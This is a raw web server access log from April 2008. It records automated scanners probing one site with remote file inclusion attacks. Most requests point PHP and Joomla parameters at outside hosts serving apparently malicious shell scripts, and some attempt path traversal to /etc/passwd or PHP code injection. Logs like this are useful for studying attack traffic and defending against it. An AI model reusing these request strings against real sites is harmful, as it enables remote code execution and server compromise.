213.157.174.120 - - [01/Apr/2008:09:00:53 -0700] "GET /logs/access_080117.log/index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:09:00:53 -0700] "GET /logs/index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:57 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:57 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:00:57 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.24.154 - - [01/Apr/2008:09:01:09 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.13.177.14 - - [01/Apr/2008:09:01:16 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
189.13.177.14 - - [01/Apr/2008:09:01:16 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:01:17 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:09:01:29 -0700] "GET /logs////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:09:01:29 -0700] "GET ////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.103 - - [01/Apr/2008:09:01:35 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:09:01:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:09:01:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:02:19 -0700] "GET /logs/access_080127.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:02:19 -0700] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:02:57 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:02:57 -0700] "GET //index.php?option=com_custompages&cpage=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:09:02:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:04:12 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [01/Apr/2008:09:04:23 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [01/Apr/2008:09:04:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [01/Apr/2008:09:04:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:05:22 -0700] "GET /logs/access_071230.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.102 - - [01/Apr/2008:09:05:22 -0700] "GET /logs/access_080126.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.3 - - [01/Apr/2008:09:05:30 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:05:36 -0700] "GET /index.php?get=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:09:05:37 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [01/Apr/2008:09:05:48 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.132.12 - - [01/Apr/2008:09:06:05 -0700] "GET //templates/default/header.inc.php?menu=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.114.132.12 - - [01/Apr/2008:09:06:05 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.geocities.com/bornok911/mytest.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:06:11 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:06:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:09:06:59 -0700] "GET /logs/access_080128.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:09:07:01 -0700] "GET //mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:09:07:02 -0700] "GET /logs//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.64.142 - - [01/Apr/2008:09:07:23 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.64.142 - - [01/Apr/2008:09:07:23 -0700] "GET /phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.39 - - [01/Apr/2008:09:07:45 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.39 - - [01/Apr/2008:09:07:45 -0700] "GET /phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:09:08:20 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:09:08:21 -0700] "GET /phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:09:08:30 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:09:08:30 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.108 - - [01/Apr/2008:09:08:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:09:08:31 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.16.243 - - [01/Apr/2008:09:08:31 -0700] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.3 - - [01/Apr/2008:09:08:36 -0700] "GET /logs/access_080218.log/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.213.50 - - [01/Apr/2008:09:08:45 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.7hlakehouse.com/calendars.html//translations/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.74.96.144 - - [01/Apr/2008:09:09:42 -0700] "GET /logs/access_080106.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:09:49 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:09:49 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:10:39 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:10:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:10:44 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.135 - - [01/Apr/2008:09:11:00 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:09:11:59 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:09:12:00 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:09:12:01 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:09:12:17 -0700] "GET /logs/access_080215.log/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [01/Apr/2008:09:12:22 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:09:12:23 -0700] "GET /logs/access_071231.log/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:09:13:46 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:14:25 -0700] "GET //index.php?option=com_custompages&cpage=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:14:38 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:14:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:14:39 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.80.93.168 - - [01/Apr/2008:09:14:42 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [01/Apr/2008:09:14:42 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [01/Apr/2008:09:14:43 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:15:04 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:15:04 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.205.57.211 - - [01/Apr/2008:09:15:10 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.205.57.211 - - [01/Apr/2008:09:15:10 -0700] "GET //Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.17.200.74 - - [01/Apr/2008:09:15:22 -0700] "GET /extauth/drivers/ldap.inc.php?clarolineRepositorySys=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.17.200.74 - - [01/Apr/2008:09:15:22 -0700] "GET /logs/extauth/drivers/ldap.inc.php?clarolineRepositorySys=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:09:15:35 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:09:15:35 -0700] "GET /phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:15:51 -0700] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:15:51 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:15:51 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:15:56 -0700] "GET /logs/access_071228.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:16:01 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:09:16:12 -0700] "GET /logs/phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.242 - - [01/Apr/2008:09:16:12 -0700] "GET /phpwcms_templateinc_scriptfrontend_rendernavigationconfig_HTML_MENU.php?HTML_MENU_DirPath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:09:16:18 -0700] "GET /logs/access_080119.log/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:16:21 -0700] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:16:21 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:16:21 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:16:35 -0700] "GET /logs/access_071228.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:16:39 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:16:39 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:16:39 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [01/Apr/2008:09:16:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.9.37.130 - - [01/Apr/2008:09:16:50 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:17:04 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:09:17:25 -0700] "GET /logs/access_080119.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:09:17:25 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:09:17:25 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:36 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:36 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:36 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:09:17:39 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:17:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:54 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:54 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:09:17:54 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:09:18:02 -0700] "GET /index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:09:18:16 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [01/Apr/2008:09:18:16 -0700] "GET //index.php?option=com_custompages&cpage=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
